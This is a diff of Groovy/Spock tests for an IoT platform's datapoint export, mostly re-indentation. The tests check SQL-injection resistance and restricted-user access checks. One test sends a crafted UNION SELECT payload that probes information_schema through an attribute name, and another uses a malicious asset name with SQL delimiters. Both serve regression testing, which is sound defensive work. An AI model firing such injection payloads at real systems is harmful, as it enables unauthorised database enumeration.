-        def assetDatapointService = container.getService(AssetDatapointService.class)
-        assetDatapointService.datapointExportLimit = 10000
-
-        and: "ensure there are no datapoints"
-        assetDatapointService.purgeDataPoints()
-
-        and: "an asset name contains SQL delimiter syntax"
-        def asset = assetStorageService.find(
-                new AssetQuery()
-                        .types(LightAsset.class)
-                        .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
-                        .names("Light 1")
-        )
-        assert asset != null
-        def originalName = asset.name
-        def maliciousAssetName = 'SQL "delimiter" $cat$ -- label'
-        def attributeName = "brightness"
-        asset.name = maliciousAssetName
-        asset = assetStorageService.merge(asset)
-
-        and: "the asset has one datapoint for a real exported attribute"
-        def dateTime = LocalDateTime.now()
-        assetDatapointService.upsertValues(
-                asset.getId(),
-                attributeName,
-                [new ValueDatapoint<>(dateTime.minusMinutes(1).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 42d)]
-        )
-
-        expect: "both crosstab formats export the datapoint without treating the asset name as SQL"
-        [DatapointExportFormat.CSV_CROSSTAB, DatapointExportFormat.CSV_CROSSTAB_MINUTE].each { format ->
-            def csvExport = assetDatapointService.exportDatapoints(
-                    [new AttributeRef(asset.id, attributeName)] as AttributeRef[],
-                    dateTime.minusMinutes(5).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
-                    dateTime.atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(),
-                    format
-            ).getText(StandardCharsets.UTF_8.name())
-            def csvExportLines = csvExport.readLines()
-
-            assert csvExportLines.size() == 2
-            assert parseCsvLine(csvExportLines[0]) == ["timestamp", maliciousAssetName + " : " + attributeName]
-            assert csvExportLines[1].contains("42")
-        }
-
-        cleanup: "restore the fixture asset name"
-        if (assetStorageService != null && asset != null && originalName != null) {
-            def currentAsset = assetStorageService.find(asset.id, true)
-            if (currentAsset != null) {
-                currentAsset.name = originalName
-                assetStorageService.merge(currentAsset)
-            }
-        }
-        if (assetDatapointService != null) {
-            assetDatapointService.datapointExportLimit = assetDatapointService.OR_DATA_POINTS_EXPORT_LIMIT_DEFAULT
-        }
+    cleanup: "restore the fixture asset name"
+    if (assetStorageService != null && asset != null && originalName != null) {
+      def currentAsset = assetStorageService.find(asset.id, true)
+      if (currentAsset != null) {
+        currentAsset.name = originalName
+        assetStorageService.merge(currentAsset)
+      }
     }
-
-    def "Export query is not vulnerable to SQL injection via REST API"() {
-
-        given: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetDatapointService = container.getService(AssetDatapointService.class)
-        assetDatapointService.datapointExportLimit = 10000
-
-        and: "ensure there are no datapoints"
-        assetDatapointService.purgeDataPoints()
-
-        and: "a resource client is created"
-        def accessToken = authenticate(
-                container,
-                keycloakTestSetup.realmCity.name,
-                KEYCLOAK_CLIENT_ID,
-                "smartcity",
-                "smartcity"
-        )
-        def response = null
-
-        when: "exporting with a malicious attribute name via REST API"
-        def asset = assetStorageService.find(
-                new AssetQuery()
-                        .types(LightAsset.class)
-                        .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
-                        .names("Light 1")
-        )
-        assert asset != null
-        def injectedAttributeName = "x')) UNION ((SELECT now()::timestamp, table_name::text, 'injected'::text, NULL::jsonb FROM information_schema.tables WHERE table_schema='public"
-        def attributeRefsJson = "[{\"id\":\"${asset.id}\",\"name\":\"${injectedAttributeName}\"}]"
-        def encodedAttributeRefs = URLEncoder.encode(attributeRefsJson, StandardCharsets.UTF_8.toString()).replace("+", "%20")
-        def fromTimestamp = LocalDateTime.now().minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
-        def toTimestamp = LocalDateTime.now().atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
-        def baseUri = serverUri(serverPort).clone()
-                .replacePath(ManagerWebService.API_PATH)
-                .path(keycloakTestSetup.realmCity.name)
-                .path("asset")
-                .path("datapoint")
-                .path("export")
-                .build()
-        def url = new URL("${baseUri}?attributeRefs=${encodedAttributeRefs}&fromTimestamp=${fromTimestamp}&toTimestamp=${toTimestamp}")
-        response = (HttpURLConnection) url.openConnection()
-        response.setRequestMethod("GET")
-        response.setRequestProperty("Authorization", "Bearer ${accessToken}")
-        response.setRequestProperty("Accept", "application/zip")
-        response.connect()
-
-        then: "the REST API should reject the unknown attribute name"
-        response.responseCode == 404
-
-        cleanup: "Remove the limit on datapoint exporting"
-        if (response != null) {
-            response.disconnect()
-        }
-        assetDatapointService.datapointExportLimit = assetDatapointService.OR_DATA_POINTS_EXPORT_LIMIT_DEFAULT
+    if (assetDatapointService != null) {
+      assetDatapointService.datapointExportLimit = assetDatapointService.OR_DATA_POINTS_EXPORT_LIMIT_DEFAULT
     }
+  }
 
-    def "Restricted users cannot export datapoints for linked non-restricted attributes"() {
-        given: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetDatapointService = container.getService(AssetDatapointService.class)
-        assetDatapointService.datapointExportLimit = 10000
+  def "Export query is not vulnerable to SQL injection via REST API"() {
 
-        and: "a linked asset has historical data for an attribute that is not restricted-readable"
-        assetDatapointService.purgeDataPoints()
-        def asset = assetStorageService.find(managerTestSetup.apartment1Id, true)
-        def attributeName = "nonRestrictedHistory"
-        asset.getAttributes().addOrReplace(new Attribute<>(attributeName, NUMBER, 0d))
-        assetStorageService.merge(asset)
+    given: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetDatapointService = container.getService(AssetDatapointService.class)
+    assetDatapointService.datapointExportLimit = 10000
 
-        def dateTime = LocalDateTime.now()
-        assetDatapointService.upsertValues(
-                asset.getId(),
-                attributeName,
-                [new ValueDatapoint<>(dateTime.minusMinutes(1).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 42d)]
-        )
+    and: "ensure there are no datapoints"
+    assetDatapointService.purgeDataPoints()
 
-        and: "a restricted user is authenticated in the asset realm"
-        def accessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
-        when: "the restricted user exports the historical datapoints"
-        def response = null
-        def attributeRefsJson = "[{\"id\":\"${asset.id}\",\"name\":\"${attributeName}\"}]"
-        def encodedAttributeRefs = URLEncoder.encode(attributeRefsJson, StandardCharsets.UTF_8.toString()).replace("+", "%20")
-        def fromTimestamp = dateTime.minusMinutes(5).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
-        def toTimestamp = dateTime.atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
-        def baseUri = serverUri(serverPort).clone()
-                .replacePath(ManagerWebService.API_PATH)
-                .path(keycloakTestSetup.realmBuilding.name)
-                .path("asset")
-                .path("datapoint")
-                .path("export")
-                .build()
-        def url = new URL("${baseUri}?attributeRefs=${encodedAttributeRefs}&fromTimestamp=${fromTimestamp}&toTimestamp=${toTimestamp}")
-        response = (HttpURLConnection) url.openConnection()
-        response.setRequestMethod("GET")
-        response.setRequestProperty("Authorization", "Bearer ${accessToken}")
-        response.setRequestProperty("Accept", "application/zip")
-        response.connect()
+    and: "a resource client is created"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmCity.name,
+            KEYCLOAK_CLIENT_ID,
+            "smartcity",
+            "smartcity"
+            )
+    def response = null
 
-        then: "the export endpoint should apply the same restricted attribute check"
-        response.responseCode == 403
+    when: "exporting with a malicious attribute name via REST API"
+    def asset = assetStorageService.find(
+            new AssetQuery()
+            .types(LightAsset.class)
+            .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
+            .names("Light 1")
+            )
+    assert asset != null
+    def injectedAttributeName = "x')) UNION ((SELECT now()::timestamp, table_name::text, 'injected'::text, NULL::jsonb FROM information_schema.tables WHERE table_schema='public"
+    def attributeRefsJson = "[{\"id\":\"${asset.id}\",\"name\":\"${injectedAttributeName}\"}]"
+    def encodedAttributeRefs = URLEncoder.encode(attributeRefsJson, StandardCharsets.UTF_8.toString()).replace("+", "%20")
+    def fromTimestamp = LocalDateTime.now().minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
+    def toTimestamp = LocalDateTime.now().atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
+    def baseUri = serverUri(serverPort).clone()
+            .replacePath(ManagerWebService.API_PATH)
+            .path(keycloakTestSetup.realmCity.name)
+            .path("asset")
+            .path("datapoint")
+            .path("export")
+            .build()
+    def url = new URL("${baseUri}?attributeRefs=${encodedAttributeRefs}&fromTimestamp=${fromTimestamp}&toTimestamp=${toTimestamp}")
+    response = (HttpURLConnection) url.openConnection()
+    response.setRequestMethod("GET")
+    response.setRequestProperty("Authorization", "Bearer ${accessToken}")
+    response.setRequestProperty("Accept", "application/zip")
+    response.connect()
 
-        cleanup: "Remove the limit on datapoint exporting"
-        if (response != null) {
-            response.disconnect()
-        }
-        assetDatapointService.datapointExportLimit = assetDatapointService.OR_DATA_POINTS_EXPORT_LIMIT_DEFAULT
+    then: "the REST API should reject the unknown attribute name"
+    response.responseCode == 404
+
+    cleanup: "Remove the limit on datapoint exporting"
+    if (response != null) {
+      response.disconnect()
     }
+    assetDatapointService.datapointExportLimit = assetDatapointService.OR_DATA_POINTS_EXPORT_LIMIT_DEFAULT
+  }
 
-    def "Restricted users cannot get datapoint periods for linked non-restricted attributes"() {
-        given: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetDatapointService = container.getService(AssetDatapointService.class)
+  def "Restricted users cannot export datapoints for linked non-restricted attributes"() {
+    given: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetDatapointService = container.getService(AssetDatapointService.class)
+    assetDatapointService.datapointExportLimit = 10000
 
-        and: "a linked asset has historical data for an attribute that is not restricted-readable"
-        assetDatapointService.purgeDataPoints()
-        def asset = assetStorageService.find(managerTestSetup.apartment1Id, true)
-        def attributeName = "nonRestrictedHistoryPeriod"
-        asset.getAttributes().addOrReplace(new Attribute<>(attributeName, NUMBER, 0d))
-        assetStorageService.merge(asset)
+    and: "a linked asset has historical data for an attribute that is not restricted-readable"
+    assetDatapointService.purgeDataPoints()
+    def asset = assetStorageService.find(managerTestSetup.apartment1Id, true)
+    def attributeName = "nonRestrictedHistory"
+    asset.getAttributes().addOrReplace(new Attribute<>(attributeName, NUMBER, 0d))
+    assetStorageService.merge(asset)
 
-        def dateTime = LocalDateTime.now()
-        assetDatapointService.upsertValues(
-                asset.getId(),
-                attributeName,
-                [new ValueDatapoint<>(dateTime.minusMinutes(1).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 42d)]
-        )
+    def dateTime = LocalDateTime.now()
+    assetDatapointService.upsertValues(
+            asset.getId(),
+            attributeName,
+            [
+              new ValueDatapoint<>(dateTime.minusMinutes(1).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 42d)
+            ]
+            )
 
-        and: "a restricted user is authenticated in the asset realm"
-        def accessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
+    and: "a restricted user is authenticated in the asset realm"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
+    when: "the restricted user exports the historical datapoints"
+    def response = null
+    def attributeRefsJson = "[{\"id\":\"${asset.id}\",\"name\":\"${attributeName}\"}]"
+    def encodedAttributeRefs = URLEncoder.encode(attributeRefsJson, StandardCharsets.UTF_8.toString()).replace("+", "%20")
+    def fromTimestamp = dateTime.minusMinutes(5).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
+    def toTimestamp = dateTime.atZone(ZoneId.systemDefault()).toInstant().toEpochMilli()
+    def baseUri = serverUri(serverPort).clone()
+            .replacePath(ManagerWebService.API_PATH)
+            .path(keycloakTestSetup.realmBuilding.name)
+            .path("asset")
+            .path("datapoint")
+            .path("export")
+            .build()
+    def url = new URL("${baseUri}?attributeRefs=${encodedAttributeRefs}&fromTimestamp=${fromTimestamp}&toTimestamp=${toTimestamp}")
+    response = (HttpURLConnection) url.openConnection()
+    response.setRequestMethod("GET")
+    response.setRequestProperty("Authorization", "Bearer ${accessToken}")
+    response.setRequestProperty("Accept", "application/zip")
+    response.connect()
 
-        when: "the restricted user requests the historical datapoint period"
-        def response = null
-        def encodedAssetId = URLEncoder.encode(asset.id, StandardCharsets.UTF_8.toString()).replace("+", "%20")
-        def encodedAttributeName = URLEncoder.encode(attributeName, StandardCharsets.UTF_8.toString()).replace("+", "%20")
-        def baseUri = serverUri(serverPort).clone()
-                .replacePath(ManagerWebService.API_PATH)
-                .path(keycloakTestSetup.realmBuilding.name)
-                .path("asset")
-                .path("datapoint")
-                .path("periods")
-                .build()
-        def url = new URL("${baseUri}?assetId=${encodedAssetId}&attributeName=${encodedAttributeName}")
-        response = (HttpURLConnection) url.openConnection()
-        response.setRequestMethod("GET")
-        response.setRequestProperty("Authorization", "Bearer ${accessToken}")
-        response.setRequestProperty("Accept", "application/json")
-        response.connect()
+    then: "the export endpoint should apply the same restricted attribute check"
+    response.responseCode == 403
 
-        then: "the period endpoint should apply the same restricted attribute check"
-        response.responseCode == 403
-
-        cleanup:
-        if (response != null) {
-            response.disconnect()
-        }
+    cleanup: "Remove the limit on datapoint exporting"
+    if (response != null) {
+      response.disconnect()
     }
+    assetDatapointService.datapointExportLimit = assetDatapointService.OR_DATA_POINTS_EXPORT_LIMIT_DEFAULT
+  }
 
-    private static List<String> parseCsvLine(String line) {
-        def fields = []
-        def current = new StringBuilder()
-        boolean quoted = false
+  def "Restricted users cannot get datapoint periods for linked non-restricted attributes"() {
+    given: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetDatapointService = container.getService(AssetDatapointService.class)
 
-        for (int i = 0; i < line.length(); i++) {
-            char c = line.charAt(i)
-            if (quoted) {
-                if (c == '"') {
-                    if (i + 1 < line.length() && line.charAt(i + 1) == '"') {
-                        current.append('"')
-                        i++
-                    } else {
-                        quoted = false
-                    }
-                } else {
-                    current.append(c)
-                }
-            } else if (c == '"') {
-                quoted = true
-            } else if (c == ',') {
-                fields.add(current.toString())
-                current.setLength(0)
-            } else {
-                current.append(c)
-            }
+    and: "a linked asset has historical data for an attribute that is not restricted-readable"
+    assetDatapointService.purgeDataPoints()
+    def asset = assetStorageService.find(managerTestSetup.apartment1Id, true)
+    def attributeName = "nonRestrictedHistoryPeriod"
+    asset.getAttributes().addOrReplace(new Attribute<>(attributeName, NUMBER, 0d))
+    assetStorageService.merge(asset)
+
+    def dateTime = LocalDateTime.now()
+    assetDatapointService.upsertValues(
+            asset.getId(),
+            attributeName,
+            [
+              new ValueDatapoint<>(dateTime.minusMinutes(1).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 42d)
+            ]
+            )
+
+    and: "a restricted user is authenticated in the asset realm"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
+
+    when: "the restricted user requests the historical datapoint period"
+    def response = null
+    def encodedAssetId = URLEncoder.encode(asset.id, StandardCharsets.UTF_8.toString()).replace("+", "%20")
+    def encodedAttributeName = URLEncoder.encode(attributeName, StandardCharsets.UTF_8.toString()).replace("+", "%20")
+    def baseUri = serverUri(serverPort).clone()
+            .replacePath(ManagerWebService.API_PATH)
+            .path(keycloakTestSetup.realmBuilding.name)
+            .path("asset")
+            .path("datapoint")
+            .path("periods")
+            .build()
+    def url = new URL("${baseUri}?assetId=${encodedAssetId}&attributeName=${encodedAttributeName}")
+    response = (HttpURLConnection) url.openConnection()
+    response.setRequestMethod("GET")
+    response.setRequestProperty("Authorization", "Bearer ${accessToken}")
+    response.setRequestProperty("Accept", "application/json")
+    response.connect()
+
+    then: "the period endpoint should apply the same restricted attribute check"
+    response.responseCode == 403
+
+    cleanup:
+    if (response != null) {
+      response.disconnect()
+    }
+  }
+
+  private static List<String> parseCsvLine(String line) {
+    def fields = []
+    def current = new StringBuilder()
+    boolean quoted = false
+
+    for (int i = 0; i <line.length(); i++) {
+      char c = line.charAt(i)
+      if (quoted) {
+        if (c == '"') {
+          if (i + 1 <line.length() && line.charAt(i + 1) == '"') {
+            current.append('"')
+            i++
+          } else {
+            quoted = false
+          }
+        } else {
+          current.append(c)
         }
-
+      } else if (c == '"') {
+        quoted = true
+      } else if (c == ',') {
         fields.add(current.toString())
-        return fields
+        current.setLength(0)
+      } else {
+        current.append(c)
+      }
     }
 
-    private static void setDatabaseSessionTimeZone(PersistenceService persistenceService, String timeZone, int connectionCount) {
-        def connectionProvider = getConnectionProvider(persistenceService)
-        def connections = []
+    fields.add(current.toString())
+    return fields
+  }
+
+  private static void setDatabaseSessionTimeZone(PersistenceService persistenceService, String timeZone, int connectionCount) {
+    def connectionProvider = getConnectionProvider(persistenceService)
+    def connections = []
+    try {
+      connectionCount.times {
+        connections.add(connectionProvider.getConnection())
+      }
+      connections.each { connection ->
+        def statement = connection.createStatement()
         try {
-            connectionCount.times {
-                connections.add(connectionProvider.getConnection())
-            }
-            connections.each { connection ->
-                def statement = connection.createStatement()
-                try {
-                    statement.execute("set time zone '${timeZone}'")
-                } finally {
-                    statement.close()
-                }
-            }
+          statement.execute("set time zone '${timeZone}'")
         } finally {
-            connections.each { connection ->
-                connectionProvider.closeConnection(connection)
-            }
+          statement.close()
         }
+      }
+    } finally {
+      connections.each { connection ->
+        connectionProvider.closeConnection(connection)
+      }
     }
+  }
 
-    private static String getDatabaseSessionTimeZone(PersistenceService persistenceService) {
-        withConnection(persistenceService) { connection ->
-            def statement = connection.createStatement()
-            try {
-                def resultSet = statement.executeQuery("select current_setting('TimeZone')")
-                try {
-                    resultSet.next()
-                    return resultSet.getString(1)
-                } finally {
-                    resultSet.close()
-                }
-            } finally {
-                statement.close()
-            }
-        }
-    }
-
-    private static <T> T withConnection(PersistenceService persistenceService, Closure<T> closure) {
-        def connectionProvider = getConnectionProvider(persistenceService)
-        def connection = connectionProvider.getConnection()
+  private static String getDatabaseSessionTimeZone(PersistenceService persistenceService) {
+    withConnection(persistenceService) { connection ->
+      def statement = connection.createStatement()
+      try {
+        def resultSet = statement.executeQuery("select current_setting('TimeZone')")
         try {
-            return closure.call(connection)
+          resultSet.next()
+          return resultSet.getString(1)
         } finally {
-            connectionProvider.closeConnection(connection)
+          resultSet.close()
         }
+      } finally {
+        statement.close()
+      }
     }
+  }
 
-    private static ConnectionProvider getConnectionProvider(PersistenceService persistenceService) {
-        return persistenceService.entityManagerFactory
-                .unwrap(SessionFactoryImplementor.class)
-                .serviceRegistry
-                .requireService(ConnectionProvider.class)
+  private static <T> T withConnection(PersistenceService persistenceService, Closure<T> closure) {
+    def connectionProvider = getConnectionProvider(persistenceService)
+    def connection = connectionProvider.getConnection()
+    try {
+      return closure.call(connection)
+    } finally {
+      connectionProvider.closeConnection(connection)
     }
+  }
 
+  private static ConnectionProvider getConnectionProvider(PersistenceService persistenceService) {
+    return persistenceService.entityManagerFactory
+            .unwrap(SessionFactoryImplementor.class)
+            .serviceRegistry
+            .requireService(ConnectionProvider.class)
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/assets/AssetDatapointPurgeTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/assets/AssetDatapointPurgeTest.groovy
@@ -41,292 +41,292 @@ import static org.openremote.manager.datapoint.AssetDatapointService.OR_DATA_POI
 
 class AssetDatapointPurgeTest extends Specification implements ManagerContainerTrait {
 
-    def "Test TimescaleDB hypercore compression and purge"() {
+  def "Test TimescaleDB hypercore compression and purge"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 30, delay: 1)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 30, delay: 1)
 
-        and: "the container is started with a 4-week retention period"
-        def config = defaultConfig()
-        config.put(OR_DATA_POINTS_MAX_AGE_WEEKS, "4")
-        def container = startContainer(config, defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetDatapointService = container.getService(AssetDatapointService.class)
-        def persistenceService = container.getService(PersistenceService.class)
-        def originalMaxTuplesDecompressedPerDmlTransaction = getMaxTuplesDecompressedPerDmlTransaction(persistenceService)
+    and: "the container is started with a 4-week retention period"
+    def config = defaultConfig()
+    config.put(OR_DATA_POINTS_MAX_AGE_WEEKS, "4")
+    def container = startContainer(config, defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetDatapointService = container.getService(AssetDatapointService.class)
+    def persistenceService = container.getService(PersistenceService.class)
+    def originalMaxTuplesDecompressedPerDmlTransaction = getMaxTuplesDecompressedPerDmlTransaction(persistenceService)
 
-        and: "the schema name is retrieved"
-        def schemaName = persistenceService.persistenceUnitProperties.getProperty(AvailableSettings.DEFAULT_SCHEMA)
-        getLOG().info("Using schema: ${schemaName}")
+    and: "the schema name is retrieved"
+    def schemaName = persistenceService.persistenceUnitProperties.getProperty(AvailableSettings.DEFAULT_SCHEMA)
+    getLOG().info("Using schema: ${schemaName}")
 
-        and: "the clock is stopped and advanced to a known time"
-        stopPseudoClock()
-        advancePseudoClock(Instant.ofEpochMilli(getClockTimeOf(container)).truncatedTo(ChronoUnit.HOURS).plus(1, ChronoUnit.HOURS).toEpochMilli() - getClockTimeOf(container), TimeUnit.MILLISECONDS, container)
+    and: "the clock is stopped and advanced to a known time"
+    stopPseudoClock()
+    advancePseudoClock(Instant.ofEpochMilli(getClockTimeOf(container)).truncatedTo(ChronoUnit.HOURS).plus(1, ChronoUnit.HOURS).toEpochMilli() - getClockTimeOf(container), TimeUnit.MILLISECONDS, container)
 
-        and: "the datapoint attributes are defined"
-        def attributeNames = (1..10).collect { "attribute${it}" }
+    and: "the datapoint attributes are defined"
+    def attributeNames = (1..10).collect { "attribute${it}" }
 
-        when: "a test asset is created with multiple attributes"
-        def testAsset = new ThingAsset("Hypercore Test Asset")
-                .setRealm(keycloakTestSetup.realmMaster.name)
-        testAsset.addOrReplaceAttributes(numberAttributes(attributeNames))
-        testAsset = assetStorageService.merge(testAsset)
+    when: "a test asset is created with multiple attributes"
+    def testAsset = new ThingAsset("Hypercore Test Asset")
+            .setRealm(keycloakTestSetup.realmMaster.name)
+    testAsset.addOrReplaceAttributes(numberAttributes(attributeNames))
+    testAsset = assetStorageService.merge(testAsset)
 
-        then: "the asset should be created"
-        testAsset.id != null
-        getLOG().info("Created test asset with ID: ${testAsset.id}")
+    then: "the asset should be created"
+    testAsset.id != null
+    getLOG().info("Created test asset with ID: ${testAsset.id}")
 
-        when: "ten assets for segment delete verification are created with the same attributes"
-        def segmentDeleteAssets = (1..10).collect { index ->
-            def asset = new ThingAsset("Hypercore Segment Delete Asset ${index}")
-                    .setRealm(keycloakTestSetup.realmMaster.name)
-            asset.addOrReplaceAttributes(numberAttributes(attributeNames))
-            assetStorageService.merge(asset)
+    when: "ten assets for segment delete verification are created with the same attributes"
+    def segmentDeleteAssets = (1..10).collect { index ->
+      def asset = new ThingAsset("Hypercore Segment Delete Asset ${index}")
+      .setRealm(keycloakTestSetup.realmMaster.name)
+      asset.addOrReplaceAttributes(numberAttributes(attributeNames))
+      assetStorageService.merge(asset)
+    }
+    def segmentDeleteAssetIds = segmentDeleteAssets.collect { it.id }
+
+    then: "the segment delete assets should be created"
+    segmentDeleteAssets.every { it.id != null }
+    getLOG().info("Created ${segmentDeleteAssets.size()} segment delete assets with IDs: ${segmentDeleteAssetIds}")
+
+    when: "25.000 datapoints are inserted across multiple attributes with some within the 4-week retention window"
+    def totalDatapoints = 25_000
+    def datapointsPerAttribute = (totalDatapoints / attributeNames.size()) as int
+    def recentDatapointsPerAttribute = (datapointsPerAttribute * 0.2) as int
+    def oldDatapointsPerAttribute = datapointsPerAttribute - recentDatapointsPerAttribute
+    def expectedRecentDatapoints = recentDatapointsPerAttribute * attributeNames.size()
+    def currentTime = getClockTimeOf(container)
+    def oldBaseTimestamp = Instant.ofEpochMilli(currentTime).minus(365, ChronoUnit.DAYS)
+    def recentBaseTimestamp = Instant.ofEpochMilli(currentTime).minus(7, ChronoUnit.DAYS)
+
+    getLOG().info("Starting to insert ${totalDatapoints} datapoints...")
+    def insertStartTime = System.currentTimeMillis()
+
+    // Insert datapoints in batches for better performance
+    def batchSize = 10000
+    attributeNames.each { attributeName ->
+      getLOG().info("Inserting ${datapointsPerAttribute} datapoints for attribute: ${attributeName}")
+
+      for (int batchStart = 0; batchStart <datapointsPerAttribute; batchStart += batchSize) {
+        def batchEnd = Math.min(batchStart + batchSize, datapointsPerAttribute)
+        def datapoints = []
+        for (int index = batchStart; index <batchEnd; index++) {
+          def timestamp = index <oldDatapointsPerAttribute
+                  ? oldBaseTimestamp.plus(index * 30, ChronoUnit.SECONDS).toEpochMilli()
+                  : recentBaseTimestamp.plus((index - oldDatapointsPerAttribute) * 30, ChronoUnit.SECONDS).toEpochMilli()
+          def value = 20.0 + (Math.sin(index / 100.0) * 10.0) + (Math.random() * 2.0)
+          datapoints.add(new ValueDatapoint<>(timestamp, value))
         }
-        def segmentDeleteAssetIds = segmentDeleteAssets.collect { it.id }
+        assetDatapointService.upsertValues(testAsset.id, attributeName, datapoints)
 
-        then: "the segment delete assets should be created"
-        segmentDeleteAssets.every { it.id != null }
-        getLOG().info("Created ${segmentDeleteAssets.size()} segment delete assets with IDs: ${segmentDeleteAssetIds}")
-
-        when: "25.000 datapoints are inserted across multiple attributes with some within the 4-week retention window"
-        def totalDatapoints = 25_000
-        def datapointsPerAttribute = (totalDatapoints / attributeNames.size()) as int
-        def recentDatapointsPerAttribute = (datapointsPerAttribute * 0.2) as int
-        def oldDatapointsPerAttribute = datapointsPerAttribute - recentDatapointsPerAttribute
-        def expectedRecentDatapoints = recentDatapointsPerAttribute * attributeNames.size()
-        def currentTime = getClockTimeOf(container)
-        def oldBaseTimestamp = Instant.ofEpochMilli(currentTime).minus(365, ChronoUnit.DAYS)
-        def recentBaseTimestamp = Instant.ofEpochMilli(currentTime).minus(7, ChronoUnit.DAYS)
-
-        getLOG().info("Starting to insert ${totalDatapoints} datapoints...")
-        def insertStartTime = System.currentTimeMillis()
-
-        // Insert datapoints in batches for better performance
-        def batchSize = 10000
-        attributeNames.each { attributeName ->
-            getLOG().info("Inserting ${datapointsPerAttribute} datapoints for attribute: ${attributeName}")
-
-            for (int batchStart = 0; batchStart < datapointsPerAttribute; batchStart += batchSize) {
-                def batchEnd = Math.min(batchStart + batchSize, datapointsPerAttribute)
-                def datapoints = []
-                for (int index = batchStart; index < batchEnd; index++) {
-                    def timestamp = index < oldDatapointsPerAttribute
-                            ? oldBaseTimestamp.plus(index * 30, ChronoUnit.SECONDS).toEpochMilli()
-                            : recentBaseTimestamp.plus((index - oldDatapointsPerAttribute) * 30, ChronoUnit.SECONDS).toEpochMilli()
-                    def value = 20.0 + (Math.sin(index / 100.0) * 10.0) + (Math.random() * 2.0)
-                    datapoints.add(new ValueDatapoint<>(timestamp, value))
-                }
-                assetDatapointService.upsertValues(testAsset.id, attributeName, datapoints)
-
-                if (batchEnd % (batchSize * 10) == 0 || batchEnd == datapointsPerAttribute) {
-                    getLOG().info("  Progress: ${batchEnd} / ${datapointsPerAttribute} datapoints inserted for ${attributeName}")
-                }
-            }
+        if (batchEnd % (batchSize * 10) == 0 || batchEnd == datapointsPerAttribute) {
+          getLOG().info("  Progress: ${batchEnd} / ${datapointsPerAttribute} datapoints inserted for ${attributeName}")
         }
+      }
+    }
 
-        def segmentDeleteDatapointsPerAttribute = 250
-        segmentDeleteAssets.eachWithIndex { asset, assetIndex ->
-            attributeNames.each { attributeName ->
-                def datapoints = []
-                for (int index = 0; index < segmentDeleteDatapointsPerAttribute; index++) {
-                    def timestamp = oldBaseTimestamp.plus(index * 30, ChronoUnit.SECONDS).toEpochMilli()
-                    datapoints.add(new ValueDatapoint<>(timestamp, 100.0 + assetIndex + index))
-                }
-                assetDatapointService.upsertValues(asset.id, attributeName, datapoints)
-            }
+    def segmentDeleteDatapointsPerAttribute = 250
+    segmentDeleteAssets.eachWithIndex { asset, assetIndex ->
+      attributeNames.each { attributeName ->
+        def datapoints = []
+        for (int index = 0; index <segmentDeleteDatapointsPerAttribute; index++) {
+          def timestamp = oldBaseTimestamp.plus(index * 30, ChronoUnit.SECONDS).toEpochMilli()
